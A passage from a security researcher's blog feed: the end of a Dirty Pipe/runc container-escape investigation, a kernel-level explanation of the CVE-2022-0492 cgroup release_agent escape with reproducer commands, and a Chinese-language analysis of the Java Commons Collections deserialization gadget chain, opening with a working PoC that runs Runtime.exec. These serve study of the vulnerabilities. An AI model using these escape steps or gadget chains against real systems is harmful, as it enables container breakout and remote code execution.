<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
81dd1b92fe8a80a0682b8ac117821790 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
81dd1b92fe8a80a0682b8ac117821790 /usr/sbin/runc
</code></pre></div></div>
<p>Emmm, interesting again, the runc isn’t been modified. Our guess is wrong.
Then I modify the dirtypipe PoC from splice syscall to sendfile syscall, as expected, it doesn’t work. So the answer is:
The sendfile syscall doesn’t share the physical page between src file and dst file.</p>
<h3> Conclusion </h3>
<p>After look into the source code, I find the ‘sendfile’ syscall is actually not share the physical page between src file and dst file. It works as following:</p>
<ul>
<li>splice the src file to a internal created pipe, this will share the src file pagecache to the pipe.</li>
<li>Then splice the data in pipe to the dst file, this will do the actual copy but no share.</li>
</ul>
<p>This behaviour also apply to the splice syscall. That is to say in splice file to pipe case the page is shared and in pipe to splice the data is not shared but actaully copied.</p>
<p>So the function who is responsible for container escape is ‘try_bindfd’ which is introduced in <a href="https://github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628">this commit</a>.
From the commit message, we know that after introduce the <a href="https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b">fix</a> for CVE-2019-5736, the runc community decide
to use a more effective methods to avoid the vulnerability. It creats a read-only bind-mount of the runc binary and then get the runc bind handle and finally unmount it.
This way the runc binary can’t be overwrite. In this methods, the /proc/self/exe is still point the runc binary in host filesystem. Combinie with the dirtypipe, we can write the actual runc binary in host.</p>
<p>After the CVE-2019-5736, most of the security researcher think that the fix is to use memfd_create to create a file in memory and copy the runc binary to this file, but this is wrong.
As we can do container escape using dirtypipe, so we think the sendfile shares the src file and dst file. But again this is wrong.
This two wrong assumption makes the thing work and seems to be expainable. Just like negative plus negative equals positive.
There is an old chinese saying, “we can only get superficial knowledge from paper, but deep knowledge from practice”, 纸上得来终觉浅,绝知此事要躬行.
The process of exploring the container escape using dirtypipe just remind of this old saying.</p>
<p>Return the Yuval pictures, it modifies the files in /bin directory. I’m not sure this is the case that Yuval escape. If he escapes from /proc/self/exe can then the shellcode modify the file in /bin directory it will be like what pictures show, if it isn’t the case, there maybe another interesting things.</p>
<h3> reference </h3>
<p><a href="https://dirtypipe.cm4all.com/">The Dirty Pipe Vulnerability</a></p>
<p><a href="https://mp.weixin.qq.com/s/VMR_kLz1tAbHrequa2OnUA">从DirtyPipe到Docker逃逸</a></p>
CVE-2022-0492: how release_agent escape become a vulnerability 2022-03-06T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/06/cve-2022-0492
<p>The cgroup release_agent escape is a classical user mode helper escape issue several years ago. Recently it has a CVE and become popular. At first glance I don’t know why and has little time to dig into the issue why it has a CVE now. After read <a href="https://twitter.com/yuvalavra">Yuval Avrahami</a>’s post <a href="https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/">New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape</a> and discussed with him I found there are a lot of things after CVE-2022-0492 so I decide make a post.</p>
<h3> CVE-2022-0492 </h3>
<p>In previous release_agent escape, we need to add CAP_SYS_ADMIN capability to the container. CVE-2022-0492 shows us that we can mount cgroupfs in new userns and then write to the release_agent file. Following is the reproducer.</p>
<p>The docker doesn’t give CAP_SYS_ADMIN to container.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# docker run --rm -it --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu bash
root@26604070fc87:/# cat /proc/self/status | grep Cap
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
test@ubuntu:~$ capsh --decode=00000000a80425fb
WARNING: libcap needs an update (cap=40 should have a name).
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
</code></pre></div></div>
<p>Then in the container we execute unshare to create new user namespace and cgroup namespace. Then we can mount the cgroupfs and write our data to release_agent.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# unshare -UrmC bash
root@26604070fc87:/# cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000
root@26604070fc87:/# mount -t cgroup -o rdma cgroup /mnt
root@26604070fc87:/# ls /mnt
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks
root@26604070fc87:/# echo "test" > /mnt/release_agent
root@26604070fc87:/# cat /mnt/release_agent
test
</code></pre></div></div>
<h3> Why sysfs and procfs can't work </h3>
<p>The poc is not complex, but the detail behind it has a lot of things. The first is that why core_pattern and uevent_helper can’t work.
Let’s see whether we can mount sysfs or procfs in new user namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# mkdir /tmp/procfs
root@26604070fc87:/# mkdir /tmp/sysfs
root@26604070fc87:/# mount -t proc procfs /tmp/procfs
mount: /tmp/procfs: permission denied.
root@26604070fc87:/# mount -t sysfs sysfs /tmp/sysfs
mount: /tmp/sysfs: permission denied.
</code></pre></div></div>
<p>As we can see, we can’t mount it.</p>
<p>The mount syscall path is as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE5(mount)
-->do_mount
-->do_new_mount
-->mount_capable
-->vfs_get_tree
-->do_new_mount_fc
-->mount_too_revealing
-->vfs_create_mount
-->do_add_mount
</code></pre></div></div>
<p>The first permission check is at ‘mount_capable’. Notice the user ns passed to ‘ns_capable’ is fs_context’s user ns.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bool mount_capable(struct fs_context *fc)
{
if (!(fc->fs_type->fs_flags & FS_USERNS_MOUNT))
return capable(CAP_SYS_ADMIN);
else
return ns_capable(fc->user_ns, CAP_SYS_ADMIN);
}
</code></pre></div></div>
<p>The ‘fc->user_ns’ is set in the ‘init_fs_context’ callback of ‘struct file_system_type’. In the cgroupfs case, as we unshare user namespace and cgroup namespace together. So the ‘fc->user_ns’ is the
new user namespace and has the CAP_SYS_ADMIN. So it will pass the ‘mount_capable’ check.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int cgroup_init_fs_context(struct fs_context *fc)
{
struct cgroup_fs_context *ctx;
ctx = kzalloc(sizeof(struct cgroup_fs_context), GFP_KERNEL);
if (!ctx)
return -ENOMEM;
ctx->ns = current->nsproxy->cgroup_ns;
...
fc->user_ns = get_user_ns(ctx->ns->user_ns);
fc->global = true;
return 0;
}
</code></pre></div></div>
<p>In the procfs case, the ‘proc_init_fs_context’ set the fc->user_ns to the pid_ns.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_init_fs_context(struct fs_context *fc)
{
struct proc_fs_context *ctx;
ctx = kzalloc(sizeof(struct proc_fs_context), GFP_KERNEL);
if (!ctx)
return -ENOMEM;
ctx->pid_ns = get_pid_ns(task_active_pid_ns(current));
put_user_ns(fc->user_ns);
fc->user_ns = get_user_ns(ctx->pid_ns->user_ns);
fc->fs_private = ctx;
fc->ops = &proc_fs_context_ops;
return 0;
}
</code></pre></div></div>
<p>As we don’t create a new pid ns so the fc->user_ns is the init user ns. And in this user namespace the container has no CAP_SYS_ADMIN so it will not pass the ‘mount_capable’ check.</p>
<h3> Why 'unshare -UrmC -pf bash' can't work </h3>
<p>So what about we also unshare the pid namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# mount -t proc procfs /mnt
mount: /mnt: permission denied.
</code></pre></div></div>
<p>We still can’t mount procfs in the new usernamespace and pid namespace. This time we will pass the ‘mount_capable’ check. However we will go to the second permission check of mount.</p>
<p>The second permission check is at ‘mount_too_revealing’. This function is interesting.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool mount_too_revealing(const struct super_block *sb, int *new_mnt_flags)
{
const unsigned long required_iflags = SB_I_NOEXEC | SB_I_NODEV;
struct mnt_namespace *ns = current->nsproxy->mnt_ns;
unsigned long s_iflags;
if (ns->user_ns == &init_user_ns)
return false;
/* Can this filesystem be too revealing? */
s_iflags = sb->s_iflags;
if (!(s_iflags & SB_I_USERNS_VISIBLE))
return false;
if ((s_iflags & required_iflags) != required_iflags) {
WARN_ONCE(1, "Expected s_iflags to contain 0x%lx\n",
required_iflags);
return true;
}
return !mnt_already_visible(ns, sb, new_mnt_flags);
}
</code></pre></div></div>
<p>The ‘mount_too_revealing’ is used only in new user namespace as we can see it return ‘false’ if it is called in the init_user_ns. So I guess the ‘revealing’ reveals the meaning, if the mount operation
reveals too much data the kernel should deny it. The first interesting part is ‘SB_I_USERNS_VISIBLE’. If the super_block data doesn’t set it, it just bypassed this reveal check. The only two fs who set this
in sysfs and procfs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (!(s_iflags & SB_I_USERNS_VISIBLE))
return false;
</code></pre></div></div>
<p>For example, the ‘proc_fill_super’ set it in ‘proc_fill_super’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_fill_super(struct super_block *s, struct fs_context *fc)
{
s->s_iflags |= SB_I_USERNS_VISIBLE | SB_I_NOEXEC | SB_I_NODEV;
}
</code></pre></div></div>
<p>So in the ‘mount_too_revealing’ permission check, the cgroupfs passed it. The procfs and sysfs will go to ‘mnt_already_visible’ which we can’t pass the permission check.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool mnt_already_visible(struct mnt_namespace *ns,
const struct super_block *sb,
int *new_mnt_flags)
{
int new_flags = *new_mnt_flags;
struct mount *mnt;
bool visible = false;
down_read(&namespace_sem);
lock_ns_list(ns);
list_for_each_entry(mnt, &ns->list, mnt_list) {
struct mount *child;
int mnt_flags;
...
list_for_each_entry(child, &mnt->mnt_mounts, mnt_child) {
struct inode *inode = child->mnt_mountpoint->d_inode;
/* Only worry about locked mounts */
if (!(child->mnt.mnt_flags & MNT_LOCKED))
continue;
/* Is the directory permanetly empty? */
if (!is_empty_dir_inode(inode))
goto next;
}
/* Preserve the locked attributes */
*new_mnt_flags |= mnt_flags & (MNT_LOCK_READONLY | \
MNT_LOCK_ATIME);
visible = true;
goto found;
next: ;
}
found:
unlock_ns_list(ns);
up_read(&namespace_sem);
return visible;
}
</code></pre></div></div>
<p>‘mnt_already_visible’ will iterate the new mount namespace and check whether it has child mountpoint. If it has child mountpoint, it is not fully visible to this mount namespace so the procfs will not be mounted.
This reason is as following. The procfs and sysfs contains some global data, so the container should not touch. So mouting procfs and sysfs in new user namespace should be restricted. Anyway, if we allow this,
we can mount the whole procfs data in new user namespace. In docker and runc environment, it has ‘maskedPaths’ which means the path should be masked in container. For example the runc’s default
maskedPaths is as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "maskedPaths": [
"/proc/acpi",
"/proc/asound",
"/proc/kcore",
"/proc/keys",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/timer_stats",
"/proc/sched_debug",
"/sys/firmware",
"/proc/scsi"
],
</code></pre></div></div>
<p>As we can see some of the proc and sys file is masked in container which means the container has no fully view of procfs and sysfs. The ‘maskedPaths’ is implemented by mounting these file to ‘/dev/null’ so the procfs has child mountpoint. As I don’t want find how to set docker’s maskedPath, let’s use runc as test. Also we will use sysfs as we just need to delete one line.</p>
<p>First we need delete the runc’s default config.json rootfs readonly configuration</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "readonly": true
</code></pre></div></div>
<p>The sysfs user the netns’s user namespace so we need use ‘unshare -Urmn sh’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/mycontainer# runc run test
/ # unshare -Urmn sh
/ # mkdir /mnt
/ # mount -t sysfs -o ro sysfs /mnt
mount: permission denied (are you root?)
</code></pre></div></div>
<p>Next we delete the ‘/sys/firmware’ in maskedPaths in config.json. Now we can see we mount sysfs successfully.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/mycontainer# runc run test
/ # unshare -Urmn sh
/ # mount -t sysfs -o ro sysfs /mnt
/ # ls /mnt
block class devices fs kernel power
bus dev firmware hypervisor module
</code></pre></div></div>
<p>I do this test in 5.4.1 successfully but failed in 5.11 maybe there are more protections. Here we uses ‘ro’ as the runc mount sysfs readonly in container.</p>
<h3> Summary </h3>
<p>Just as Yuval Avrahami point out, CVE-2022-0492 is about ‘creating new user & cgroup namespace’ and do the release_agent escape. The kernel security mechanism behind this CVE is quite interesing.</p>
<h3> Reference </h3>
<p>I mostly read Yuval Avrahami post and thanks him to point the key understanding of CVE-2022-0492.</p>
<p><a href="https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/">New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?</a>
<a href="https://github.com/opencontainers/runc/issues/1658">Rootless containers don’t work from unprivileged non-root Docker container (operation not permitted for mounting procfs)</a></p>
Java反序列化漏洞研究前序: Transformer、动态代理与注解2022-01-30T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/01/30/java-dynamic-proxy-and-annotation
<p>今年给自己定了一个研究清楚Java反序列化漏洞的KPI,反序列化漏洞本身原理并不复杂,但是网上的资料都不甚满意,大部分都是只是知道怎么用别人的PoC,并没有对具体的原理做深入的分析和思考,特别是Commons Collections一系列的分析,非常不满意,比如反序列化为什么需要有自己的readObject、为什么AnnotationInvocationHandler的第一个参数为Override.class和Target.class都可以。最终我决定自己深入分析各个知识点。最主要是分析动态代理和注解,但是为了完整第一部分会分析Transformer。</p>
<h3> PoC </h3>
<p>首先,先放上最基本的Commons Collections的PoC,如下代码会直接弹出计算器。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public static void main(String[] args) throws Exception {
Transformer[] transformers = {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class}, new Class[]{Runtime.class, null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};
Transformer chain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
innerMap.put("value","test");
Map outerMap = TransformedMap.decorate(innerMap, null, chain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Retention.class ,outerMap);
//序列化
FileOutputStream fos = new FileOutputStream("cc1");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(instance);
oos.close();
//反序列化
FileInputStream fis = new FileInputStream("cc1");
ObjectInputStream ois = new ObjectInputStream(fis);
ois.readObject();
ois.close();
}
</code></pre></div></div>
<h3> Transformer </h3>
<p>Commons Collections里面提供了一个强大的接口叫做Transformer,顾名思义,这个接口用来实现一种转换,其中的InvokerTransformer特别重要,它会调用指定的函数进行转换,下面是使用该Transformer的一个例子。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public class Main {
public static void main(String[] args) {
HashMap<String, String> a = new HashMap<>();
Transformer keyTrans = new InvokerTransformer("concat", new Class[]{String.class}, new Object[]{"A"});
Transformer valueTrans = new InvokerTransformer("toUpperCase", new Class[]{}, new Object[]{});
Map b = TransformedMap.decorate(a, keyTrans, valueTrans);
b.put("a", "aaa");
b.put("b", "bbb");
b.put("c", "ccc");
Iterator it = b.entrySet().iterator();
while(it.hasNext()) {
Map.Entry entry = (Map.Entry)it.next();
System.out.println("key="+entry.getKey()+",value="+entry.getValue());
}
}
}
</code></pre></div></div>
<p>输出如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> key=cA,value=CCC
key=bA,value=BBB
key=aA,value=AAA
</code></pre></div></div>
<p>InvokerTransformer类的构造函数有三个参数,第一个是方法名,第二个是该方法的参数类型,第三个是传递给该方法的参数。TransformedMap.decorate的第一个参数是需要修饰的map,第二个是key所使用的Transformer,第三个是value所使用的Transformer。经过如此配置之后,当我们从被”decorate”之后的map(b)添加元素的时候,每一个添加的元素都会被经过“修饰”之后放到map(a)中去。</p>
<p>直接看TransformedMap的源码:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object put(Object key, Object value) {
key = this.transformKey(key);
value = this.transformValue(value);
return this.getMap().put(key, value);
}
protected Object transformKey(Object object) {
return this.keyTransformer == null ? object : this.keyTransformer.transform(object);
}
protected Object transformValue(Object object) {
return this.valueTransformer == null ? object : this.valueTransformer.transform(object);
}
</code></pre></div></div>
<p>接着看看InvokerTransformer类的transform实现:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object transform(Object input) {
if (input == null) {
return null;
} else {
try {
Class cls = input.getClass();
Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
return method.invoke(input, this.iArgs);
} catch (NoSuchMethodException var5) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
} catch (IllegalAccessException var6) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
} catch (InvocationTargetException var7) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
}
}
}
</code></pre></div></div>
<p>这段代码就是Commons Collections的核心的,本质上就是调用了参数input对应的类型的任意method方法,iMethodName、iParamTypes以及iArgs是InvokerTransformer在构造时候提供的参数。</p>
<p>回到PoC,其中我们使用了ChainedTransformer,代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Transformer chain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
innerMap.put("value","test");
Map outerMap = TransformedMap.decorate(innerMap, null, chain);
</code></pre></div></div>
<p>ChainedTransformer的transform实现如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object transform(Object object) {
for(int i = 0; i < this.iTransformers.length; ++i) {
object = this.iTransformers[i].transform(object);
}
return object;
}
</code></pre></div></div>
<p>其本质是将iTransformers(通过构造ChainedTransformer指定)逐个调用transform,前一个的返回结果作为后一个的参数。结合transformers的定义:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Transformer[] transformers = {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class}, new Class[]{Runtime.class, null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};
</code></pre></div></div>
<p>ConstantTransformer的transform仅为返回参数对应的Object,对于使用transformers来进行装饰的map,其transform的过程如下:</p>
<ol>
<li>Runtime.class表示class Runtime,第一个链返回自身</li>
<li>Runtime.class本身是一个class Class的实例,并且Class是由getMethod方法的,所以在第一个InvokerTransformer会中在Runtime.class上调用getMethod参数设置为getRuntime,这样,获得了一个Method对象(getRuntime)</li>
<li>在第二个InvokerTransformer会调用getRuntime这个Method的invoke方法,这样返回了一个Runtime对象</li>
<li>在第三个InvokerTransformer会调用Runtime的exec函数,并且传递参数calc.exe,这样就达到了执行代码的目的。</li>
</ol>
<p>这个过程本质上如图所示。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Object obj0 = Runtime.class;
Class cls1 = obj0.getClass();
Method method1 = cls1.getMethod("getMethod", new Class[]{String.class, Class[].class});
Object obj1 = method1.invoke(obj0, "getRuntime", new Class[0]);
Class cls2 = obj1.getClass();
Method method2 = cls2.getMethod("invoke", new Class[]{Object.class, Object[].class});
Object obj2 = method2.invoke( obj1, null, new Object[0]);
Class cls3 = obj2.getClass();
Method method3 = cls3.getMethod("exec", new Class[]{String.class});
Object obj3 = method3.invoke(obj2, "calc.exe");
</code></pre></div></div>
<p>下面是调试结果:</p>
<p><img src="/assets/img/java1/1.png" alt="" /></p>
<h3> 动态代理 </h3>
<p>动态代理的例子网上很多,随便找一个<a href="https://www.jianshu.com/p/9bcac608c714">例子</a>来分析。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> interface HelloInterface {
void sayHello();
}
class Hello implements HelloInterface{
@Override
public void sayHello() {
System.out.println("Hello world!");
}
}
class ProxyHandler implements InvocationHandler {
private Object object;
public ProxyHandler(Object object){
this.object = object;
}
@Override
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
System.out.println("Before invoke " + method.getName());
method.invoke(object, args);
System.out.println("After invoke " + method.getName());
return null;
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.getProperties().setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
HelloInterface hello = new Hello();
InvocationHandler handler = new ProxyHandler(hello);
HelloInterface proxyHello = (HelloInterface) Proxy.newProxyInstance(hello.getClass().getClassLoader(), hello.getClass().getInterfaces(), handler);
proxyHello.sayHello();
System.out.println(proxyHello);
}
}
</code></pre></div></div>
<p>输出如下,可见通过proxyHello对象调用的函数都会经过我们的ProxyHandler代理。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Before invoke sayHello
Hello world!
After invoke sayHello
Before invoke toString
After invoke toString
null
</code></pre></div></div>
<p>通过调试可知,此时proxyHello本质上是一个实现了HelloInterface的$Proxy0类型对象,$Proxy0是内部生成的。</p>
<p><img src="/assets/img/java1/2.png" alt="" /></p>
<p>在目录下找到该文件查看内容如下,可见该自动生成的Proxy类实现了HelloInterface,其成员函数包含HelloInterface的接口sayHello以及所有Object接口的几个基本函数,其实现均为调用了super.h.invoke函数,这个函数就是代理handler(这里的ProxyHandler)需要实现的函数。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public final class $Proxy0 extends Proxy implements HelloInterface {
private static Method m3;
private static Method m1;
private static Method m0;
private static Method m2;
public $Proxy0(InvocationHandler var1) throws {
super(var1);
}
public final void sayHello() throws {
try {
super.h.invoke(this, m3, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
public final boolean equals(Object var1) throws {
try {
return (Boolean)super.h.invoke(this, m1, new Object[]{var1});
} catch (RuntimeException | Error var3) {
throw var3;
} catch (Throwable var4) {
throw new UndeclaredThrowableException(var4);
}
}
public final int hashCode() throws {
try {
return (Integer)super.h.invoke(this, m0, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
public final String toString() throws {
try {
return (String)super.h.invoke(this, m2, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
static {
try {
m3 = Class.forName("test.com.company.HelloInterface").getMethod("sayHello");
m1 = Class.forName("java.lang.Object").getMethod("equals", Class.forName("java.lang.Object"));
m0 = Class.forName("java.lang.Object").getMethod("hashCode");
m2 = Class.forName("java.lang.Object").getMethod("toString");
} catch (NoSuchMethodException var2) {
throw new NoSuchMethodError(var2.getMessage());
} catch (ClassNotFoundException var3) {
throw new NoClassDefFoundError(var3.getMessage());
}
}
}
</code></pre></div></div>
<p>回到例子中这一句:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> (HelloInterface) Proxy.newProxyInstance(hello.getClass().getClassLoader(), hello.getClass().getInterfaces(), handler);
</code></pre></div></div>
<p>可以看到newProxyInstance的参数,第一个是加载器,第二个是interfaces,第三个是处理handler,这里可以看到代理其实是绑定到interface的,跟具体实现Hello是没有关系的。所以我们的例子可以简化为如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> interface HelloInterface {
void sayHello();
}
class ProxyHandler implements InvocationHandler {
@Override
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
System.out.println("Before invoke " + method.getName());
System.out.println(method.getName()+" is called");
System.out.println("After invoke " + method.getName());
return "test";
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.getProperties().setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
InvocationHandler handler = new ProxyHandler();
HelloInterface proxyHello = (HelloInterface) Proxy.newProxyInstance(HelloInterface.class.getClassLoader(), new Class[]{HelloInterface.class}, handler);
proxyHello.sayHello();
System.out.println(proxyHello);
}
}
</code></pre></div></div>
<p>输出如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Before invoke sayHello
sayHello is called
After invoke sayHello
Before invoke toString
toString is called
After invoke toString
test
</code></pre></div></div>
<p>这个时候再去看生成的$Proxy0.class,内容其实是一样的。所以本质上,Proxy是为需要代理的接口生成了一个类,返回该的对象,用户可以通过该对象调用对应的接口,最终会调用到用户指定的handler中去。</p>
<h3> Java注解实现 </h3>
<p>本质上理解Java注解是为了理解Commons Collections中搞的AnnotationInvocationHandler的用法。
Java的注解是代码级别的注释,之所以说是注释是因为注解本身并不影响被注解代码的运行表现,之所以说是代码层面的,是因为注解也是会生成代码的,可以在运行时后获取注解,做一些判断、检查类的工作,比如Java编译时候使用。注解分为普通注解和元注解,普通注解比如@Override、@Deprecated用来作用在代码上,元注解比如@Retention、@Target等用来作用在程序员自定义的注解上。下面的代码,我们自己定义了两个注解,一个作用在类上,一个作用在方法上,并且自定义的Person类使用了这两个注解。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.TYPE)
@interface AnnType {
String msg() default "type";
}
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.METHOD)
@interface AnnMethod {
String msg() default "method";
}
@AnnType(msg="xaa")
class Person {
String name;
int age;
public Person() {
name = "aa";
age = 12;
}
public void print() {
System.out.println(name);
}
@AnnMethod
public String to_string() {
return "Person{" +
"name='" + name + '\'' +
'}';
}
}
public class Main {
public static void main(String[] args) throws Exception {
System.setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
System.out.println(new Person().to_string());
}
}
</code></pre></div></div>
<p>输出如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Person{name='aa'}
</code></pre></div></div>
<p>可以看到注解并没有影响到代码功能。</p>
<h4> 每一个注解实现为一个interface </h4>
<p>下面的代码:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Class<?> annTypecls = AnnType.class;
Class<?>[] panntype = annTypecls.getInterfaces();
</code></pre></div></div>
<p><img src="/assets/img/java1/3.png" alt="" /></p>
<h4> 注解的使用 </h4>
<p>看看注解的使用:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> AnnType annType = Person.class.getAnnotation(AnnType.class);
String annTypeValue = annType.msg();
AnnMethod annMethod = Person.class.getMethod("to_string", new Class[0]).getAnnotation(AnnMethod.class);
String annMethodValue = annMethod.msg();
System.out.println("annTypevalue = " + annTypeValue+", annMethodValue = " + annMethodValue);
</code></pre></div></div>
<p>输出:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> annTypevalue = xaa, annMethodValue = method
</code></pre></div></div>
<p>对比例子代码,可以看到Class的注解为我们制定的值xaa,Method的注解为默认值method。我们已经知道注解是一个interface,那么Class/Method.getAnnotation返回必定是一个实现了这个interface的类。通过调试可以看到getAnnotation返回的是一个代理类型的对象。这就是我们在第二节中说的动态代理,并且其handler为AnnotationInvocationHandler。</p>
<p><img src="/assets/img/java1/4.png" alt="" /></p>
<h4> Annotation实现 </h4>
<p>这一节跟随</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Person.class.getAnnotation(AnnType.class);
</code></pre></div></div>
<p>研究Annotation的实现。</p>
<p>Class对象有一个annotations成员,保存了类型的注解信息,annotations是一个Map,key为注解Class,value为实现了Annotation的动态代理类。getAnnotation实现如下,initAnnotationsIfNecessary用来初始化annotations,仅会在第一次调用时执行实际工作。当annotations有值时,直接通过annotationClass查询Map返回即可。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Map<Class<? extends Annotation>, Annotation> annotations;
public <A extends Annotation> A getAnnotation(Class<A> annotationClass) {
if (annotationClass == null)
throw new NullPointerException();
initAnnotationsIfNecessary();
return (A) annotations.get(annotationClass);
}
</code></pre></div></div>
<p>initAnnotationsIfNecessary的实现如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private synchronized void initAnnotationsIfNecessary() {
clearAnnotationCachesOnClassRedefinition();
if (annotations != null)
return;
declaredAnnotations = AnnotationParser.parseAnnotations(
getRawAnnotations(), getConstantPool(), this);
Class<?> superClass = getSuperclass();
